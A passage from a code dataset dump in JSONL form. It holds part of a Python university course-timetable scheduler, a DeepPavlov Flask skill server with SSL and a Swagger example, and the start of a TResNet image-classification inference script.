!= 0 and sec == \"AB\":\n\t\t\t\tsubject_time = FREE_TIME_GROUP[num_day[len(num_day)-1]][0]\n\t\t\telif len (num_day) != 0 and t == 0:\n\t\t\t\tsubject_time = FREE_TIME_GROUP[num_day[0]][0]\n\t\t\telif len (num_day) != 0 and t == 1:\n\t\t\t\tsubject_time = FREE_TIME_GROUP[num_day[len(num_day)-1]][0]\n\t\t\telse:\n\t\t\t\tpass\n\n\t\t\tif finish == 1 or finish == 3:\n\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\tfor e in case1[b]:\n\t\t\t\t\t\t\t\tx = int(e[0])\n\t\t\t\t\t\t\t\ty = int(e[1])\n\t\t\t\t\t\t\t\ttimetable_teacher[a][x][y] = \"_BUSY_\"\n\n\t\t\t#print (subject_time)\n\t\t\tif subject_time != []:\n\t\t\t\tfor x in subject_time:\n\t\t\t\t\tsubject_description[i][6].append(x)\n\n\t\t\t\tfor a in subject_time:\n\t\t\t\t\to = int(a[0])\n\t\t\t\t\tu = int(a[1])\n\t\t\t\t\t#Update timetable_room\n\t\t\t\t\tif sec == \"AB\":\n\t\t\t\t\t\tMIX_SCHEDULE[A][o][u] = subject[0]\n\t\t\t\t\t\tMIX_SCHEDULE[B][o][u] = subject[0]\n\t\t\t\t\telif sec == \"AA\":\n\t\t\t\t\t\tMIX_SCHEDULE[A][o][u] = subject[0]\n\t\t\t\t\telif sec == \"BB\":\n\t\t\t\t\t\tMIX_SCHEDULE[B][o][u] = subject[0]\n\t\t\t\t\telif sec == \"CC\":\n\t\t\t\t\t\tMIX_SCHEDULE[C][o][u] = subject[0]\n\t\t\t\t\t#Update timetable_teacher\n\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\tfor b in range(len(all_teacher)-1): \n\t\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\t\ttimetable_teacher[a][o][u] = subject[0]\n\t\t\t\t\t#Update timetable_room\n\t\t\t\t\tfor e in range(len(room_code)):\n\t\t\t\t\t\tif subject[5] == room_code[e]:\n\t\t\t\t\t\t\ttimetable_room[e][o][u] = subject[0]\n\t\t\t\t\tfinish = 5\n\t\t\telif check_freeday == 0:\n\t\t\t\tcheck_freeday = 1\n\t\t\telse:\n\t\t\t\tif finish == 0:\n\t\t\t\t\t#print (\"case 1\")\n\t\t\t\t\tcase1 = [[]for d in range(len(all_teacher)-1)]\n\t\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\t\tfor o in range(5):\n\t\t\t\t\t\t\t\t\tfor u in range(10):\n\t\t\t\t\t\t\t\t\t\tif timetable_teacher[a][o][u] == \"_BUSY_\":\n\t\t\t\t\t\t\t\t\t\t\ttimetable_teacher[a][o][u] = FREE\n\t\t\t\t\t\t\t\t\t\t\tcase1[b].append(timetable[o][u])\n\n\t\t\t\telif finish == 1:\n\t\t\t\t\t#print (\"case 2\")\n\t\t\t\t\thr_1.append([\"0\"])\n\t\t\t\t\thr_2.append([\"8\",\"9\"])\n\t\t\t\t\thr_3.append([\"0\",\"1\",\"2\"])\n\t\t\t\t\thr_3.append([\"7\",\"8\",\"9\"])\n\t\t\t\t\n\t\t\t\telif finish == 2:\n\t\t\t\t\t#print (\"case 3\")\n\t\t\t\t\tfor b in range(len(all_teacher)-1):\n\t\t\t\t\t\tfor a in range(len(teacher_name)):\n\t\t\t\t\t\t\tif all_teacher[b] == teacher_name[a]:\n\t\t\t\t\t\t\t\tfor e in case1[b]:\n\t\t\t\t\t\t\t\t\tx = int(e[0])\n\t\t\t\t\t\t\t\t\ty = int(e[1])\n\t\t\t\t\t\t\t\t\ttimetable_teacher[a][x][y] = FREE\n\t\t\t\telif finish == 3:\n\t\t\t\t\t#print (subject[0]+\"_Error\")\n\t\t\t\t\tpass\n\t\t\t\tfinish += 1\n\n\treturn ([MIX_SCHEDULE,subject_description,timetable_teacher,timetable_room])\n\ndef schedule(data):\n\t\n\t#extract data\n\tteacher_name = data[0]\n\tteacher_busy = data[1]\n\tsubject_description = data[2]\n\tcenter_subject = data[3]\n\troom_code = data[4]\n\tFREE = \" \"\n\n\tfor i in range(len(subject_description)):\n\t\tsubject_description[i].append([])\n\n\ttimetable = [[\"00\",\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\"],\n\t\t\t\t[\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\"],\n\t\t\t\t[\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\"],\n\t\t\t\t[\"30\",\"31\",\"32\",\"33\",\"34\",\"35\",\"36\",\"37\",\"38\",\"39\"],\n\t\t\t\t[\"40\",\"41\",\"42\",\"43\",\"44\",\"45\",\"46\",\"47\",\"48\",\"49\"]]\n\n\t#Update timetable_teacher\n\ttimetable_teacher = [[[FREE] * 10 for i in range(5)]for i in range(len(teacher_busy))]\n\tfor a in range(len(teacher_busy)):\n\t\tfor e in teacher_busy[a]:\n\t\t\tfor i in range(5):\n\t\t\t\tfor o in range(10):\n\t\t\t\t\tif e == timetable[i][o]:\n\t\t\t\t\t\ttimetable_teacher[a][i][o] = \"_BUSY_\"\n\t\t\t\t\t\t\n\ttimetable_room = [[[FREE] * 10 for i in range(5)]for i in range(len(room_code))]\n\t\n\t#subject_do_not_use_this_time = [[]for i in range(len(subject_description))]\n\n\tMIX_SCHEDULE_KEY = [\"B1_secA\",\"B1_secB\",\"B2_secA\",\"B2_secB\",\"B3_secA\",\"B3_secB\",\"B4_secA\",\"B4_secB\",\"Master\",\"Doctorate\"]\n\tMIX_SCHEDULE = [[[FREE] * 10 for i in range(5)]for i in range(10)]\n\t\n\t#Update MIX_SCHEDULE with MONDAY_PM\n\tfor i in range(len(MIX_SCHEDULE)):\n\t\tfor o in (5,6,7,8,9):\n\t\t\tMIX_SCHEDULE[i][0][o] = \"_FULL_\"\n\n\t#Update MIX_SCHEDULE with CENTER_SUBJECT\n\tfor i in range(len(center_subject)):\n\t\tcenter_sub_level = center_subject[i][1]\n\t\tcenter_sub_sec = center_subject[i][2]\n\t\tfor a in center_subject[i][3]:\n\t\t\to = int(a[0])\n\t\t\tu = int(a[1])\n\t\t\tif center_sub_level == \"1\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[0][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[1][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[0][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[1][o][u] = center_subject[i][0]\n\t\t\t\n\t\t\telif center_sub_level == \"2\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[2][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[3][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[2][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[3][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"3\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[4][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[5][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[4][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[5][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"4\":\n\t\t\t\tif center_sub_sec == \"AB\":\n\t\t\t\t\tMIX_SCHEDULE[6][o][u] = center_subject[i][0]\n\t\t\t\t\tMIX_SCHEDULE[7][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"AA\":\n\t\t\t\t\tMIX_SCHEDULE[6][o][u] = center_subject[i][0]\n\t\t\t\telif center_sub_sec == \"BB\":\n\t\t\t\t\tMIX_SCHEDULE[7][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"M\":\n\t\t\t\t\tMIX_SCHEDULE[8][o][u] = center_subject[i][0]\n\n\t\t\telif center_sub_level == \"D\":\n\t\t\t\t\tMIX_SCHEDULE[9][o][u] = center_subject[i][0]\n\n\t#find posititon of priority_room\n\tpriority_room = [\"FB306\",\"FB401\",\"FB402\",\"FB403-4\"]\n\tpriority_room_num = [99,99,99,99]\n\tfor i in range(len(room_code)):\n\t\tif room_code[i] == priority_room[0]:\n\t\t\tpriority_room_num[0] = i\n\t\telif room_code[i] == priority_room[1]:\n\t\t\tpriority_room_num[1] = i\n\t\telif room_code[i] == priority_room[2]:\n\t\t\tpriority_room_num[2] = i\n\t\telif room_code[i] == priority_room[3]:\n\t\t\tpriority_room_num[3] = i\n\t\n\t#sort subject position by priority_room\n\tAB_sub = []\n\tAA_BB_sub = []\n\n\tFB306_AA_BB_sub = []\n\tFB401_AA_BB_sub = []\n\tFB402_AA_BB_sub = []\n\tFB403_4_AA_BB_sub = []\n\tANOTHER_ROOM_AA_BB_sub = []\n\n\tFB306_AB_sub = []\n\tFB401_AB_sub = []\n\tFB402_AB_sub = []\n\tFB403_4_AB_sub = []\n\tANOTHER_ROOM_AB_sub = []\n\n\tfor i in range(len(subject_description)):\n\t\tif subject_description[i][4] == \"AB\":\n\t\t\tAB_sub.append(i)\n\t\telse :\n\t\t\tAA_BB_sub.append(i)\t\n\n\tfor i in AA_BB_sub:\n\t\tif subject_description[i][5] == \"FB306\":\n\t\t\tFB306_AA_BB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB401\":\n\t\t\tFB401_AA_BB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB402\":\n\t\t\tFB402_AA_BB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB403-4\":\n\t\t\tFB403_4_AA_BB_sub.append(i)\n\t\telse :\n\t\t\tANOTHER_ROOM_AA_BB_sub.append(i)\n\tfor i in AB_sub:\n\t\tif subject_description[i][5] == \"FB306\":\n\t\t\tFB306_AB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB401\":\n\t\t\tFB401_AB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB402\":\n\t\t\tFB402_AB_sub.append(i)\n\t\telif subject_description[i][5] == \"FB403-4\":\n\t\t\tFB403_4_AB_sub.append(i)\n\t\telse :\n\t\t\tANOTHER_ROOM_AB_sub.append(i)\n\n\t#manage schedule\n\tfor i in FB306_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB401_AA_BB_sub:\n\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB402_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB403_4_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\t#-----------------------------------------------------------------------------------------------#\n\n\tfor i in FB306_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB401_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB402_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in FB403_4_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\t#-----------------------------------------------------------------------------------------------#\n\n\tfor i in ANOTHER_ROOM_AA_BB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\tfor i in ANOTHER_ROOM_AB_sub:\n\t\tmanage = manage_schedule(i,subject_description,teacher_name,timetable_teacher,room_code,\n\t\t\t\t\t\t\t\ttimetable_room,MIX_SCHEDULE,timetable)\n\t\tMIX_SCHEDULE = manage[0]\n\t\tsubject_description = manage[1]\n\t\ttimetable_teacher = manage[2]\n\t\ttimetable_room = manage[3]\n\n\t#-----------------------------------------------------------------------------------------------#\n\n\t#show schedule\n\t#print_timetable(MIX_SCHEDULE,MIX_SCHEDULE_KEY)\n\t#print_timetable(timetable_teacher,teacher_name)\n\t#print_timetable(timetable_room,room_code)\n\t#for i in subject_description:\n\t#\tprint (i)\n\n\treturn([subject_description,center_subject])\n\n\"\"\"data = [#teacher_name = data[0]\n\t\t[\"Assoc. Prof. Dr.Siam Charoenseang\",\n\t\t\"Asst. Prof. Dr.Thavida Maneewarn\",\n\t\t\"Mr.Bawornsak Sakulkueakulsuk\",\n\t\t\"Dr.Pitiwut Teerakittikul\",\n\t\t\"Mr.Thanacha Choopojcharoen\",\n\t\t\"Asst.Prof.Dr.Eakkachai Pengwang\",\n\t\t\"Dr.Arbtip Dheeravongkit\",\n\t\t\"Dr.Supachai Vongbunyong\",\n\t\t\"Dr.Prakarnkiat Youngkong\",\n\t\t\"Mr.Worawit Panpanytep\",\n\t\t\"Dr.Warasinee Chaisangmongkon\",\n\t\t\"Dr.Orapadee Joochim\",\n\t\t\"Dr.Suriya Natsupakpong\",\n\t\t\"Dr.Boontariga Kasemsontitum\",\n\t\t\"Mr.Narongsak\",\n\t\t\"Dr.Pornpoj\",\n\t\t\"Ms.Mirawee Kumpakure\",\n\t\t\"Dr.Arbtip Dheeravongkit\"\n\t\t],\n\t\t\n\t\t#teacher_busy = data[1]\n\t\t[\n\t\t[\"00\",\"01\",\"02\"],\n\t\t[\"00\",\"34\",\"35\",\"36\"],\n\t\t[\"41\",\"42\",\"43\",\"44\",\"45\"],\n\t\t[\"40\",\"41\",\"42\",\"43\",\"44\"],\n\t\t[\"41\",\"42\",\"43\",\"44\"],\n\t\t[\"01\",\"02\",\"03\"],\n\t\t[\"45\",\"46\",\"47\",\"48\"],\n\t\t[\"20\",\"21\",\"22\",\"23\"],\n\t\t[\"10\",\"11\",\"12\"],\n\t\t[\"30\",\"31\",\"32\",\"33\"],\n\t\t[\"00\",\"01\",\"02\",\"03\",\"04\"],\n\t\t[\"21\",\"34\",\"35\",\"36\"],\n\t\t[\"21\",\"34\",\"35\",\"36\"],\n\t\t[\"47\",\"48\",\"49\"],\n\t\t[\"37\",\"38\",\"39\",\"40\",\"41\",\"42\"],\n\t\t[\"10\",\"11\",\"12\",\"13\"],\n\t\t[\"05\",\"06\",\"07\",\"08\"],\n\t\t[\"27\",\"28\",\"29\"]\n\t\t],\n\t\t\n\t\t\n\t\t#subject_description = data[2]\n\t\t[\n\t\t[\"FRA141\",\"1\",\"Dr.Warasinee Chaisangmongkon,\", \"2/2\",\"AA\",\"FB306\"],\n\t\t[\"FRA141\",\"1\",\"Mr.Bawornsak Sakulkueakulsuk,\", \"2/2\",\"BB\",\"FB306\"],\n\t\t[\"FRA161\",\"1\",\"Dr.Prakarnkiat Youngkong,\", \"3/1\",\"AA\",\"FB403-4\"],\n\t\t[\"FRA161\",\"1\",\"Asst.Prof.Dr.Eakkachai Pengwang,\", \"3/1\",\"BB\",\"FB301\"],\n\t\t[\"FRA221\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"AA\",\"FB306\"],\n\t\t[\"FRA221\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"BB\",\"FB306\"],\n\t\t[\"FRA222\",\"2\",\"Asst. Prof. Dr.Thavida Maneewarn,\", \"3\",\"AA\",\"FB301\"],\n\t\t[\"FRA222\",\"2\",\"Asst. Prof. Dr.Thavida Maneewarn,\", \"3\",\"BB\",\"FB301\"],\n\t\t[\"FRA231\",\"2\",\"Asst.Prof.Dr.Eakkachai Pengwang,\", \"3\",\"AB\",\"FB403-4\"],\n\t\t[\"FRA241\",\"2\",\"Mr.Bawornsak Sakulkueakulsuk,\", \"3\",\"AB\",\"FB401\"],\n\t\t[\"FRA261\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"AA\",\"FB306\"],\n\t\t[\"FRA261\",\"2\",\"Dr.Pitiwut Teerakittikul,\", \"3\",\"BB\",\"FB306\"],\n\t\t[\"FRA321\",\"3\",\"Dr.Suriya Natsupakpong,\", \"3\",\"AA\",\"FB304\"],\n\t\t[\"FRA321\",\"3\",\"Mr.Worawit Panpanytep,\", \"3\",\"BB\",\"FB304\"],\n\t\t[\"FRA331\",\"3\",\"Mr.Thanacha Choopojcharoen,\", \"3\",\"AA\",\"FB305\"],\n\t\t[\"FRA331\",\"3\",\"Mr.Thanacha Choopojcharoen,\", \"3\",\"BB\",\"FB305\"],\n\t\t[\"FRA332\",\"3\",\"Dr.Arbtip Dheeravongkit,\", \"3\",\"AA\",\"FB305\"],\n\t\t[\"FRA332\",\"3\",\"Asst.Prof.Dr.Eakkachai Pengwang,\", \"3\",\"BB\",\"FB305\"],\n\t\t[\"FRA341\",\"3\",\"Dr.Pornpoj,\", \"3\",\"AA\",\"FB301\"],\n\t\t[\"FRA341\",\"3\",\"Dr.Pornpoj,\", \"3\",\"BB\",\"FB301\"],\n\t\t[\"FRA361\",\"3\",\"Mr.Narongsak,\", \"3\",\"AB\",\"FB401\"],\n\t\t[\"FRA451\",\"4\",\"Dr.Boontariga Kasemsontitum,Dr.Suriya Natsupakpong,\", \"3\",\"AB\",\"FB306\"],\n\t\t[\"FRA452\",\"4\",\"Dr.Supachai Vongbunyong,\", \"3\",\"AB\",\"FB305\"],\n\t\t[\"FRA522\",\"M\",\"Dr.Orapadee Joochim,\", \t\"3\",\"CC\",\"FB301\"],\n\t\t[\"FRA543\",\"M\",\"Dr.Supachai Vongbunyong,\", \"3/1\",\"CC\",\"FB304\"],\n\t\t[\"FRA621\",\"D\",\"Dr.Orapadee Joochim,\", \t\"3/1\",\"CC\",\"FB305\"],\n\t\t[\"FRA641\",\"D\",\"Assoc. Prof. Dr.Siam Charoenseang\", \"3\",\"CC\",\"FB304\"],\n\t\t],\n\t\t\n\t\t#center_subject = data[3]\n\t\t[\n\t\t[\"GEN101\",\"1\",\"AB\",[\"27\",\"28\"]],\n\t\t[\"LNG101\",\"1\",\"AB\",[\"41\",\"42\",\"43\"]],\n\t\t[\"MTH101\",\"1\",\"AB\",[\"22\",\"23\",\"45\",\"46\"]],\n\t\t[\"PHY103\",\"1\",\"AA\",[\"10\",\"11\",\"47\"]],\n\t\t[\"PHY103\",\"1\",\"BB\",[\"00\",\"01\",\"48\"]],\n\t\t[\"PHY191\",\"1\",\"AB\",[\"02\",\"03\"]],\n\t\t[\"LNG1-2\",\"1\",\"AB\",[\"41\",\"42\",\"43\"]],\n\t\t[\"LNG2-3\",\"2\",\"AB\",[\"30\",\"31\",\"32\"]],\n\t\t[\"MTH201\",\"2\",\"AB\",[\"25\",\"26\",\"27\",\"47\"]],\n\t\t[\"LNG103\",\"3\",\"AB\",[\"31\",\"32\",\"33\"]]\n\t\t],\n\n\t\t#room = data[4]\n\t\t[\n\t\t\"FB301\",\n\t\t\"FB304\",\n\t\t\"FB305\",\n\t\t\"FB306\",\n\t\t\"FB401\",\n\t\t\"FB402\",\n\t\t\"FB403-4\"\n\t\t]\n\t\t]\"\"\"\ndata = call_data()\noutput = schedule(data)\nsave_output(output)\n#print (\"Finish :D\")\n\n","sub_path":"FRA241-Integrate-master/FRA241-Integrate-master/Algorithm.py","file_name":"Algorithm.py","file_ext":"py","file_size_in_byte":32002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"591993814","text":"import os\nimport re\n# from multiprocessing import Process\nfrom pathlib import Path\nfrom itertools import islice\nfrom typing import Union, Optional, Dict\nfrom logging import getLogger\nimport ssl\nimport argparse\n\nfrom flasgger import Swagger, swag_from\nfrom flask import Flask, request, jsonify, redirect\nfrom flask_cors import CORS\nfrom deeppavlov.core.commands.infer import build_model\nfrom deeppavlov.core.common.chainer import Chainer\n\n# from core.config import ANNOTATORS, SKILL_SELECTORS, SKILLS, RESPONSE_SELECTORS, POSTPROCESSORS\n\n# from utils.server_utils.server import skill_server\nlog = getLogger(__name__)\napp = Flask(__name__)\nSwagger(app)\nCORS(app)\n\npattern = re.compile(r'^https?://(?P.*):(?P\\d*)(?P.*)$')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('config', type=str)\nparser.add_argument('-p', '--port', type=int)\nparser.add_argument('-host', '--host', type=str)\nparser.add_argument('-ep', '--endpoint', type=str)\n\n\ndef _get_ssl_context(ssl_key, ssl_cert):\n ssh_key_path = Path(ssl_key).resolve()\n if not ssh_key_path.is_file():\n e = FileNotFoundError('Ssh key file not found: please provide correct path in --key param or '\n 'https_key_path param in server configuration file')\n log.error(e)\n raise e\n\n ssh_cert_path = Path(ssl_cert).resolve()\n if not ssh_cert_path.is_file():\n e = FileNotFoundError('Ssh certificate file not found: please provide correct path in --cert param or '\n 'https_cert_path param in server configuration file')\n log.error(e)\n raise e\n\n ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)\n ssl_context.load_cert_chain(ssh_cert_path, ssh_key_path)\n return ssl_context\n\n\ndef interact_skill(model: Chainer, batch_size: Optional[int] = None):\n if not request.is_json:\n log.error(\"request Content-Type header is not application/json\")\n return jsonify({\n \"error\": \"request Content-Type header is not application/json\"\n }), 400\n\n data = request.get_json()\n try:\n dialog_states = iter(data['dialogs'])\n except (KeyError, TypeError):\n return jsonify({\n 'error': 'illegal payload format'\n }), 500\n\n responses = []\n while True:\n batch = list(islice(dialog_states, batch_size))\n if not batch:\n break\n try:\n result = model(batch)\n except Exception as e:\n log.error(f'Got an exception when trying to infer the model: {type(e).__name__}: {e}')\n return jsonify({\n 'error': f'{type(e).__name__}: {e}'\n }), 500\n if len(model.out_params) == 1:\n result = [result]\n responses += [dict(zip(model.out_params, response)) for response in zip(*result)]\n\n return jsonify({\n 'responses': responses\n }), 200\n\n\ndef skill_server(config: Union[dict, str, Path], https=False, ssl_key=None, ssl_cert=None, *,\n host: Optional[str] = None, port: Optional[int] = None, endpoint: Optional[str] = None,\n download: bool = True, batch_size: Optional[int] = None, env: Optional[Dict[str, str]] = None):\n if env:\n os.environ.update(env)\n host = host or '0.0.0.0'\n port = port or 80\n endpoint = f'/{endpoint}' or '/skill'\n if batch_size is not None and batch_size < 1:\n log.warning(f'batch_size of {batch_size} is less than 1 and is interpreted as unlimited')\n batch_size = None\n\n ssl_context = _get_ssl_context(ssl_key, ssl_cert) if https else None\n\n model = build_model(config, download=download)\n\n endpoint_description = {\n 'description': 'A skill endpoint',\n 'parameters': [\n {\n 'name': 'data',\n 'in': 'body',\n 'required': 'true',\n 'example': {\n 'version': '0.9.3',\n 'dialogs': [\n {\n 'id': '5c65706b0110b377e17eba41',\n 'location': None,\n 'utterances': [\n {\n \"id\": \"5c62f7330110b36bdd1dc5d7\",\n \"text\": \"Привет!\",\n \"user_id\": \"5c62f7330110b36bdd1dc5d5\",\n \"annotations\": {\n \"ner\": {},\n \"coref\": {},\n \"sentiment\": {},\n \"obscenity\": {}\n },\n \"date\": \"2019-02-12 16:41:23.142000\"\n },\n {\n \"id\": \"5c62f7330110b36bdd1dc5d8\",\n \"active_skill\": \"chitchat\",\n \"confidence\": 0.85,\n \"text\": \"Привет, я бот!\",\n \"user_id\": \"5c62f7330110b36bdd1dc5d6\",\n \"annotations\": {\n \"ner\": {},\n \"coref\": {},\n \"sentiment\": {},\n \"obscenity\": {}\n },\n \"date\": \"2019-02-12 16:41:23.142000\"\n },\n {\n \"id\": \"5c62f7330110b36bdd1dc5d9\",\n \"text\": \"Как дела?\",\n \"user_id\": \"5c62f7330110b36bdd1dc5d5\",\n \"annotations\": {\n \"ner\": {},\n \"coref\": {},\n \"sentiment\": {},\n \"obscenity\": {}\n },\n \"date\": \"2019-02-12 16:41:23.142000\"\n }\n ],\n 'user': {\n 'id': '5c62f7330110b36bdd1dc5d5',\n 'user_telegram_id': '44d279ea-62ab-4c71-9adb-ed69143c12eb',\n 'user_type': 'human',\n 'device_type': None,\n 'persona': None\n },\n 'bot': {\n 'id': '5c62f7330110b36bdd1dc5d6',\n 'user_telegram_id': '56f1d5b2-db1a-4128-993d-6cd1bc1b938f',\n 'user_type': 'bot',\n 'device_type': None,\n 'personality': None\n },\n 'channel_type': 'telegram'\n }\n ]\n }\n }\n ],\n 'responses': {\n \"200\": {\n \"description\": \"A skill response\",\n 'example': {\n 'responses': [{name: 'sample-answer' for name in model.out_params}]\n }\n }\n }\n }\n\n @app.route('/')\n def index():\n return redirect('/apidocs/')\n\n @app.route(endpoint, methods=['POST'])\n @swag_from(endpoint_description)\n def answer():\n return interact_skill(model, batch_size)\n\n app.run(host=host, port=port, threaded=False, ssl_context=ssl_context)\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n skill_server(args.config, port=args.port, host=args.host, endpoint=args.endpoint)\n","sub_path":"core/run_dp_servers.py","file_name":"run_dp_servers.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"609381102","text":"import torch\n# from src.helper_functions.helper_functions import parse_args\nfrom src.models import create_model\nimport argparse\nimport numpy as np\nfrom PIL import Image\nfrom src.models.tresnet import TResNet\n\n\ndef infer_batch(model, classes_list, inputs, threshold=0.7):\n # inputs: batch, channel, height, weight\n # print('ASL Example Inference code on a batch of images')\n\n output = torch.sigmoid(model(inputs))\n\n probs = output.cpu().detach().numpy()\n labels = []\n labels_probs = []\n\n # print(type(classes_list))\n # numpy array\n\n for i in range(0, inputs.shape[0]):\n np_output = probs[i, :]\n # print(np_output.shape)\n detected_classes = classes_list[np_output > threshold]\n # print(detected_classes)\n labels.append(detected_classes)\n labels_probs.append(np_output[np_output > threshold])\n\n return probs, labels, labels_probs\n\n\ndef load_model(model_type):\n\n if model_type is \"L\":\n model_name = \"tresnet_l\"\n path = './pth_files/MS_COCO_TRresNet_L_448_86.6.pth'\n input_size = 448\n threshold = 0.5\n elif model_type is \"XL\":\n model_name = \"tresnet_xl\"\n path = './pth_files/MS_COCO_TResNet_xl_640_88.4.pth'\n input_size = 640\n threshold = 0.5\n\n state = torch.load(path, map_location='cpu')\n num_classes = state['num_classes']\n\n if model_type is \"L\":\n do_bottleneck_head = False\n model = TResNet(layers=[4, 5, 18, 3], num_classes=num_classes, in_chans=3, width_factor=1.2,\n do_bottleneck_head=do_bottleneck_head)\n elif model_type is \"XL\":\n model = TResNet(layers=[4, 5, 24, 3], num_classes=num_classes, in_chans=3, width_factor=1.3)\n\n model = model.cuda()\n model.load_state_dict(state['model'], strict=True)\n model.eval()\n\n classes_list = np.array(list(state['idx_to_class'].values()))\n\n return model, input_size, threshold, num_classes, classes_list\n\n\ndef test_single():\n\n model, input_size, threshold, num_classes, classes_list = load_model(\"L\")\n\n pic_path = './pics/000000000885.jpg'\n\n im = Image.open(pic_path)\n im_resize = im.resize((input_size, input_size))\n np_img = np.array(im_resize, dtype=np.uint8)\n np_imgs = np.stack([np_img, np_img])\n print(np_imgs.shape)\n tensor_img = torch.from_numpy(np_imgs).permute(0, 3, 1, 2).float() / 